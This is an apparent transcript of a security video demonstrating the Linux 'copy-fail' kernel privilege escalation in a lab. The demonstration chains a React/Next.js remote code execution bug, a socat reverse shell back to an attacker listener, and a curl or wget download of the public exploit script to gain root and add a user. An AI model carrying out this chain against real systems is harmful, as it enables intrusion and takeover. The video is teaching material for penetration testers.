Linux is HACKED ? Copy Fail Exploit Works Everywhere!

Added: 2026-05-06

[00:00:00]Linux is hacked. So, what I mean by Linux is hacked, I mean that every Linux distribution that's released after 2017 is vulnerable to a vulnerability called copy-fail or a CVE-2026-31431.

[00:00:15]So, what I mean exactly by this copy-fail vulnerability? So, let me just give you a brief introduction or a brief explanation of this exact vulnerability.

[00:00:24]So, let's just say an attacker have access into a machine and he only have a user privilege or he cannot execute any root [music] access or a permission. For example, he cannot actually install new software to the application. He cannot create new users. He cannot do any root privileged actions or any functions that requires a root privileges. But using this CVE or using this script that's released by copy-fail, which is only few few lines of Python code, you can actually execute it into the hacked machine and this will give you from a low-level privileged user into a root access that you can run any command from executing a command that can create a user, delete a user. He can actually, for example, steal a file or for example, modify into the system file.

[00:01:12]That's not your mistake. That's not any like a misconfiguration that you need to update when you install your system or for example, you installed some malicious package. No, that's on the Linux kernel itself. On 2011, they added an update into the Linux kernel, which is an AF_AESH, which is a wrapper used internally by IPsec for a crypto operations. Second update was added on the 2015, which is an AF_ALG, which is a socket support was added that the kernel crypto API exposed to user space. It lets [music] programs talk directly to the kernel cryptographic system. And on 2017, a small in-place optimization was added to alg AEAD. Just a minor performance tweak seemed completely harmless. Individually, they were super fine, nothing crazy, but all these updates together, they created a bomb. They are the reason that vulnerability exactly existing today.

[00:02:13]So, if you go to copy.fail or maybe you go to their GitHub repo, they've released a 732-byte Python script that allows any attacker have access to any low-level privileged user access, he can get it [music] to a root privileged access. So, only a 732-byte Python script, any unprivileged user can run the script and get [music] root access into the system. No race condition, no crashes, no kernel offset needed. And now, let me show you exactly how a real hacker can actually exploit this vulnerability into a real world scenario on a real case that you can maybe facing, maybe you're having an application or maybe you're having or maybe you're doing a pen test time to time or maybe even if you have a bug bounty and you have you just found the CVE that allows you to get remote code execution into the system, but you want to actually get more privileges or you want to root access into the system so you can actually prove more impact. Now, let me just show you how real hacker can actually exploit this CVE into a real world scenario. For example, you can see right here, we have a vulnerable lab.

[00:03:18]So, we're going to click right here.

[00:03:20]We're going to launch this vulnerable lab, which is the latest Next.js CVE that I already have a video in this channel. If you want to know more about the CVE, you can go ahead and watch it.

[00:03:28]So, basically, we have this URL, which is a vulnerable application, which is a cloud host, as you can see right here.

[00:03:35]So, that's just a simple vulnerable application. So, let's say we found the URL or the attacker found a victim computer and he can actually do a reverse shell. For example, [music] I'll just say, for example, do something like this and we can run a command. So, that's a CVE-2025-55182, [music] which is a react to shell CVE that I already explained into [music] this channel. You can see we can launch this command. We can run ID. We can, for example, uh just try to do, for example, ls and we can run any command we want.

[00:04:11]But if we're going to try to do who am I, you can see that we don't have a root access. We are acting as a normal user, which is, as you can see right here, which is a lock user. So, that's the name of the user. Okay? And if you want to try, for example, add user in a normal session that we don't have any root access, [music] you can see it's saying that you need a root access or, for example, you need to do sudo add user, then we're going to name, for example, I don't know, like a a user.

[00:04:39]So, here we're going to do like give it a sudo permission, then we're going to add the command, then we're going to name the user. But if you're going to click okay, you can see it's requiring the password and as a attacker, we don't have the root password of the machine.

[00:04:51]We only can access as a normal user. So, [music] this is when this CVE or the Linux CVE copy-fail comes into a play.

[00:04:58]For example, just do something like this, okay? And now, we need to run the script released by copy-fail. If you go to copy-fail right here >> [music] >> and let's just run into this command.

[00:05:10]They have a simple command to run. For example, this command right here, which is a curl copy-fail.sh exp, etc. So, which is just a Python script. We're going to copy it.

[00:05:20]Basically, it's trying to curl the command. It's trying to get the script, then it's going to try to execute it or run this Python script. If we're going to try to run it as a normal machine, so that's the attacker machine, that's normal one, you can see that it's this is how it looks. For example, we're going to do who am I, it's going to give us a root access. But that's in our machine. We want to do to do it into the victim machine. So, that's the victim machine when we can run command. So, let's just try to add this command and we click enter. You can see we are not getting anything. So, basically, we don't have a we don't have an interactive shell. So, we need like a real interactive shell. So, we can do like a reverse shell >> [music] >> through netcat, but netcat will be like the same problem. We cannot actually have like an interactive shell in uh interactive shell with the the attacked system or the hacked system. So, I had to do some research and I found we can actually do like an interactive reverse shell using socat. You can do it with Python. You can also do it with netcat, but the best way is to do it with socat so you can actually run command and see, for example, uh if [music] we can if we're going to try to run like tmux, we can actually see the result of tmux.

[00:06:31]Okay? So, if you don't know anything about tmux, basically, tmux allows you to open a session inside [music] uh your your machine. It's going to still running. For example, you're trying to scan for something. It's going to keep [music] running this scan and you can get out of the machine. Maybe you're having a VPS or maybe you're having a just say a hacked machine or a vulnerable application, you can just run tmux and let the command run inside this machine and it will not stop until you going to get into this tmux session and it like exit this session. Okay? So, that's not our topic. Just a brief explanation. So, we have socat. So, we need to do a reverse shell. So, basically, on a reverse shell, there is two steps. The first step, which is like trying to listen. So, what I mean by listen, basically, a reverse shell, you need a listener. Basically, it's someone in the network, maybe like in some server, is trying to listen for somebody to connect to him. He's waiting for some connection to come into the server. For example, that's IP address or into this port. He's waiting for someone to connect to him to give him maybe a file to send a file. For for example, to give him a reverse shell, which is this uh this situation right here. So, we need two things. We need to first set up a reverse shell. We need to set up a listener. So, we're going to add this into the attacker machine. So, this is our [music] machine right here. So, basically, what's going on? So, we are using socat and listening on the port 444 using the TCP protocol. So, we're going to click enter. So, here, our machine is trying to listen. [music] It's trying to wait for somebody to connect to us. So, as we have this vulnerable machine that we can run command to it, we're going to try to send connection into our machine. For example, if we're going to copy this, right? And we can see on victim. So, that's the victim machine, right? So, we're going to click right here and we're going to launch this command. You can see I already have it, but uh okay, let's just try it, for example, like this.

[00:08:27]And we're going to like paste this command. But as you can see right here, we're having this IP address. So, this is not my IP address. This just my IP [music] address to test. So, we need to change it into the like the hacker IP address. It needs to be public or local IP address. Does not matter. But in a real world scenario, always it's going to be like a public IP address or maybe a domain name in order to give it a connection back. So, we're going to do, for example, 127.0.0.1, which is our local host. Then we're going to click enter. So, you can see it's [music] doing some lag. It's taking some time right here. But if you go to the hacker machine, as you can see right here, you can see we have the the session of the victim. Okay? So, now we can connect.

[00:09:11]For example, we're going to do who am I and then I click enter. You can see we are in a lock user. But the trick is if we want to do, for example, add user, and you can see we need the root access.

[00:09:23]Okay? If, for example, we need to do sudo add user, for example, Mark. If we're going to do enter, we can see we're having password. So, we need the password of the root machine. Now, we're going to do control C again and we're going to come back. And now, this is when the like this CVE or this like the copy-fail CVE comes into a play. So, if we come back to copy-fail and we're going to copy this Python script or this command and we're going to run it into our reverse shell. Okay? So, we're going to click here and we're going to click enter. You can see we're having this shell right here that we can actually run command as a root user. If we're going to do who am I again, you can see we are into root. If we're going to try to do add user again, for example, Mark, and we're going to click enter, you can see it's asking for the password to create a new user, [music] okay? So, for example, we can add a random user.

[00:10:23]Right, so you can see Mark is added into the group. And let's just try to do cat etc password to see if the user is created. [music] If we come back again, and let's do cat etc password, and you can see [music] that we have it right here, which is a Mark. So, we just created a user into the victim machine. So, that's not the reason or that's not what we can actually do. We can do whatever uh command we want, but just This is just a proof of concept that we can actually execute command as a root user. So, I think that's the CVE what it's about.

[00:11:00]And also, you can go into their GitHub repo and just copy uh this file right here. You can just copy this file, and you can just do it like this, or maybe you need to just do a W get.

[00:11:15]Okay, we can do it like this.

[00:11:18]And I do exit first.

[00:11:21]Log out. As you can see, we just logged out from the victim machine, and we can do W get and click enter, and we have this file, this Python file. If we're going to try to do, for example, Python 3 copy and click enter, you're going to see who am I again, and you can see we are root access. So, basically, this vulnerability was found by And as you can see right here, if you can uh scroll down, you can see [music] uh it's found by XZ code right here. You can actually try their product, and also, like, [music] this vulnerability was found by the AI. They're claiming they found it only 1 hour, and for a vulnerability that has been existing for 7 years, and it's found only by 1 hour using XZ code AI or whatever AI out there AI model out there, which is something very crazy or something very concerning. And there's more attacks, so there's more CVEs are going to go out in the next few days or months, because now we have these AI-powered agents that can actually do hacking for us or can do code review for us. So, basically, more vulnerability will be discovered in the next few months or the next few years, which is something that is very concerning, and it's very good for hackers to like for white hat hackers, because if there is more attack scenario, there is more actually attack surfaces, of course, it's going to be uh these companies or these organizations are going to be targeted by hackers, and they need other white hat hackers to secure them. So, at least that's what I think for now, and I think that's it for this video. Thank you so much for watching this video. If you want to learn more about ethical hacking, bug bounty, pen testing, I already have a bug bounty course or pen testing course into the description. You can go to hackers.space. [music] You can pick the best program for you, and there is an interactive chat. You can actually connect with other hackers. You can learn more about how you can use AI into hacking, etc., and a lot of more uh other vulnerability types. So, thank you so much for watching this video, and don't forget, if you have any question, any misunderstanding, you can type them on the comment section. I reply to all the comments, and don't forget to click the like button, subscribe button, and see you in the next one.